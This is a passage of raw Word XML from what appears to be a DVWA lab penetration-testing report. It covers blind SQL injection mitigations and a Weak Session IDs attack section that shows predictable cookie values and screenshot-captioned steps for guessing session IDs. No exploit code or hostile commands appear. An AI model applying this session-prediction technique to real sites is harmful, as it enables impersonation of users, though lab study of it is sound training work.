      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FF47394" wp14:editId="29B85069">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="15813808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FE65" w14:textId="616F31BF" w:rsidR="00F97D8B" w:rsidRDefault="00F97D8B" w:rsidP="00F97D8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="142" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622F274E" w14:textId="2BAE9EDC" w:rsidR="00C119EB" w:rsidRPr="00F97D8B" w:rsidRDefault="00C119EB" w:rsidP="00C119EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AC7732C" wp14:editId="7787A455">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1184193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5892" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc198745933"/>
      <w:r>
        <w:t>High</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="572CAB1A" w14:textId="7A786188" w:rsidR="00C119EB" w:rsidRPr="00C119EB" w:rsidRDefault="00C119EB" w:rsidP="00C119EB"/>
    <w:p w14:paraId="6216CB9A" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc198745934"/>
      <w:r>
        <w:t>Mitigation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="0E5FBB0D" w14:textId="77777777" w:rsidR="00C119EB" w:rsidRPr="00C119EB" w:rsidRDefault="00C119EB" w:rsidP="00C119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9E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C119EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1. Use Prepared Statements (Parameterized Queries)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9670EC" w14:textId="20CCB8A3" w:rsidR="00C119EB" w:rsidRPr="00C119EB" w:rsidRDefault="00C119EB" w:rsidP="00C119EB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C119EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1876C88E" w14:textId="77777777" w:rsidR="00C119EB" w:rsidRPr="00C119EB" w:rsidRDefault="00C119EB" w:rsidP="00C119EB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C119EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$stmt = $pdo-&gt;prepare("SELECT * FROM users WHERE id = ?");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF8B99E" w14:textId="77777777" w:rsidR="00C119EB" w:rsidRPr="00C119EB" w:rsidRDefault="00C119EB" w:rsidP="00C119EB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C119EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$stmt-&gt;execute([$_GET['id']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F5A78F" w14:textId="77777777" w:rsidR="00C119EB" w:rsidRPr="00C119EB" w:rsidRDefault="00C119EB" w:rsidP="00C119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9E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C119EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. Validate User Input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2229E587" w14:textId="77777777" w:rsidR="00C119EB" w:rsidRPr="00C119EB" w:rsidRDefault="00C119EB" w:rsidP="00C119EB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9EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Enforce numeric-only validation for id parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5737F2" w14:textId="77777777" w:rsidR="00C119EB" w:rsidRPr="00C119EB" w:rsidRDefault="00C119EB" w:rsidP="00C119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9E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C119EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3. Disable Error Messages and Delay Feedback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790A18D3" w14:textId="77777777" w:rsidR="00C119EB" w:rsidRPr="00C119EB" w:rsidRDefault="00C119EB" w:rsidP="00C119EB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9EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Avoid behavioral responses that help infer data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136755A9" w14:textId="77777777" w:rsidR="00C119EB" w:rsidRPr="00C119EB" w:rsidRDefault="00C119EB" w:rsidP="00C119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9E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C119EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4. Use Web Application Firewalls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4DE35F" w14:textId="77777777" w:rsidR="00C119EB" w:rsidRPr="00C119EB" w:rsidRDefault="00C119EB" w:rsidP="00C119EB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9EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Detect and block patterns of blind SQLi behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D18AF72" w14:textId="77777777" w:rsidR="00C119EB" w:rsidRPr="00C119EB" w:rsidRDefault="00C119EB" w:rsidP="00C119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9E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C119EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5. Least Privilege Principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070F6CAD" w14:textId="77777777" w:rsidR="00C119EB" w:rsidRPr="00C119EB" w:rsidRDefault="00C119EB" w:rsidP="00C119EB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9EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Limit database user permissions to prevent data leakage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FC0507" w14:textId="77777777" w:rsidR="00C119EB" w:rsidRPr="00C119EB" w:rsidRDefault="00C119EB" w:rsidP="00C11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02267" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRPr="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B"/>
    <w:p w14:paraId="238C667D" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="74848F64" w14:textId="1D9BD447" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc198745935"/>
      <w:r>
        <w:t>Weak Session IDs</w:t>
      </w:r>
      <w:r w:rsidR="009036BC">
        <w:t>-Attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="2CF0EAAD" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc198745936"/>
      <w:r>
        <w:t>Intro</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="2C71D470" w14:textId="77777777" w:rsidR="00C119EB" w:rsidRPr="00C119EB" w:rsidRDefault="00C119EB" w:rsidP="00C1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119E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uring testing of DVWA’s </w:t>
      </w:r>
      <w:r w:rsidRPr="00C119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eak Session IDs</w:t>
      </w:r>
      <w:r w:rsidRPr="00C119E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dule, I observed that the application uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00C119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edictable or insufficiently random session identifiers</w:t>
      </w:r>
      <w:r w:rsidRPr="00C119E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track authenticated users. This allows an attacker like me to potentially </w:t>
      </w:r>
      <w:r w:rsidRPr="00C119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uess or brute-force valid session IDs</w:t>
      </w:r>
      <w:r w:rsidRPr="00C119E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impersonating users without needing credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EF882F" w14:textId="77777777" w:rsidR="00C119EB" w:rsidRPr="00C119EB" w:rsidRDefault="00C119EB" w:rsidP="00C1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119E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ak session ID generation is a serious issue that undermines the core principle of session management and confidentiality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A64CED" w14:textId="77777777" w:rsidR="00C119EB" w:rsidRPr="00C119EB" w:rsidRDefault="00C119EB" w:rsidP="00C11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7BFC5" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc198745937"/>
      <w:r>
        <w:t>Low</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="1943A648" w14:textId="00E783E2" w:rsidR="002F2587" w:rsidRPr="002F2587" w:rsidRDefault="002F2587" w:rsidP="002F2587">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F2587">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="002F2587">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 1: Analyzing Session ID Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A0270A" w14:textId="68068020" w:rsidR="002F2587" w:rsidRDefault="002F2587" w:rsidP="002F2587">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      </w:pPr>
      <w:r>
        <w:t>I logged in and observed the cookie header:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79111248" w14:textId="77777777" w:rsidR="002F2587" w:rsidRDefault="002F2587" w:rsidP="002F2587">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>dvwaSession=2; security_level=0; PHPSESSID=6d3c4eaed157f16218889a8e4ddd30a7; security=low</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1834D6" w14:textId="77777777" w:rsidR="002F2587" w:rsidRDefault="002F2587" w:rsidP="002F2587">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>dvwaSession=3; security_level=0; PHPSESSID=6d3c4eaed157f16218889a8e4ddd30a7; security=low</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A12E739" w14:textId="780AACC4" w:rsidR="002F2587" w:rsidRDefault="002F2587" w:rsidP="002F2587">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>dvwaSession=4; security_level=0; PHPSESSID=6d3c4eaed157f16218889a8e4ddd30a7; security=low</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CA242F" w14:textId="0594B322" w:rsidR="002F2587" w:rsidRDefault="002F2587" w:rsidP="002F2587">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002F2587">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="002F2587">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F2587">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observation</w:t>
      </w:r>
      <w:r w:rsidRPr="002F2587">
        <w:t>: Session IDs are short, hex-based, and in some cases predictable (especially on Low security).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAC11DD" w14:textId="75D552A0" w:rsidR="002F2587" w:rsidRPr="002F2587" w:rsidRDefault="002F2587" w:rsidP="002F2587">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="002F2587">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="002F2587">
        <w:t xml:space="preserve"> Step 2: Testing Predictability (Low Level)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73354210" w14:textId="6E285E36" w:rsidR="00C119EB" w:rsidRDefault="00C119EB" w:rsidP="00C119EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r w:rsidRPr="00C119EB">
        <w:t>Intercept_Req</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10791DC1" w14:textId="1B2722D3" w:rsidR="002F2587" w:rsidRDefault="002F2587" w:rsidP="002F2587">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="196EB9CC" wp14:editId="5FED82F3">
            <wp:extent cx="5731510" cy="2773680"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="1671911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30B9" w14:textId="1FC22574" w:rsidR="00C119EB" w:rsidRDefault="00C119EB" w:rsidP="00C119EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r w:rsidRPr="00C119EB">
        <w:t>Intercept_Req2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7B11E4" w14:textId="74B86FB0" w:rsidR="002F2587" w:rsidRPr="00C119EB" w:rsidRDefault="002F2587" w:rsidP="002F2587">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FE758E2" wp14:editId="55DB7A3E">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="9916442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C8FF" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc198745938"/>
      <w:r>
        <w:t>Med</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="61B93581" w14:textId="6B394B2E" w:rsidR="0055184D" w:rsidRDefault="002F2587" w:rsidP="0055184D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="142"/>
      </w:pPr>
      <w:r w:rsidRPr="002F2587">
        <w:t>Capture_Sessionid.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5668DC15" w14:textId="18C9C66E" w:rsidR="0055184D" w:rsidRDefault="0055184D" w:rsidP="0055184D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57F17E37" wp14:editId="60CE0FF9">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="13789123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E343" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="0055184D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62697898" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="0055184D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E55E333" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="0055184D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68EFBEA4" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="0055184D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EEC38F0" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="0055184D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B5B745C" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="0055184D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="124E73B0" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="0055184D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F96C409" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="0055184D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="267D0534" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="0055184D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AB94E31" w14:textId="71416317" w:rsidR="002F2587" w:rsidRDefault="0055184D" w:rsidP="0055184D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="142"/>
      </w:pPr>
      <w:r w:rsidRPr="0055184D">
        <w:t>Conver_into_Timestamp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445207C0" w14:textId="3CAC7DCD" w:rsidR="0055184D" w:rsidRDefault="0055184D" w:rsidP="0055184D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B6D9BFA" wp14:editId="08272549">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="19547552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EE86" w14:textId="614D5100" w:rsidR="0055184D" w:rsidRDefault="0055184D" w:rsidP="0055184D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="142"/>
      </w:pPr>
      <w:r w:rsidRPr="0055184D">
        <w:t>Capture_2_Sessionid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032B3E46" w14:textId="50C96C11" w:rsidR="0055184D" w:rsidRDefault="0055184D" w:rsidP="0055184D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3670826E" wp14:editId="537D475A">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="10374984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08A4" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="0055184D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A729832" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="0055184D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ED18F97" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="0055184D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3936E9E4" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="0055184D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F432157" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="0055184D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="272F113B" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="0055184D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BCBA018" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="0055184D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29B7A1BC" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="0055184D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EA8ECC2" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="0055184D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="752998AE" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="0055184D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E650070" w14:textId="1447AC9E" w:rsidR="00984C64" w:rsidRDefault="0055184D" w:rsidP="00984C64">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="142"/>
      </w:pPr>
      <w:r w:rsidRPr="0055184D">
        <w:t>Convert_Timestamp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4DF169" w14:textId="3E8C2C63" w:rsidR="0055184D" w:rsidRPr="002F2587" w:rsidRDefault="0055184D" w:rsidP="0055184D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="142"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B25F780" wp14:editId="225289CD">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="136359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D613" w14:textId="77777777" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc198745939"/>
      <w:r>
        <w:t>High</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="42C5E1C1" w14:textId="2DA1B7D0" w:rsidR="0055184D" w:rsidRDefault="0055184D" w:rsidP="0055184D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r w:rsidRPr="0055184D">
        <w:t>Copy_Session_hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485FEB87" w14:textId="3B497EDA" w:rsidR="0055184D" w:rsidRDefault="0055184D" w:rsidP="0055184D">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EEFB3D8" wp14:editId="3EC4E358">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="17202193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8898" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="0055184D">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EE15948" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="0055184D">
      <w:pPr>
        <w:ind w:left="66"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09CFFE1D" w14:textId="77777777" w:rsidR="00984C64" w:rsidRDefault="00984C64" w:rsidP="0055184D">
      <w:pPr>
        <w:ind w:left="66"/>
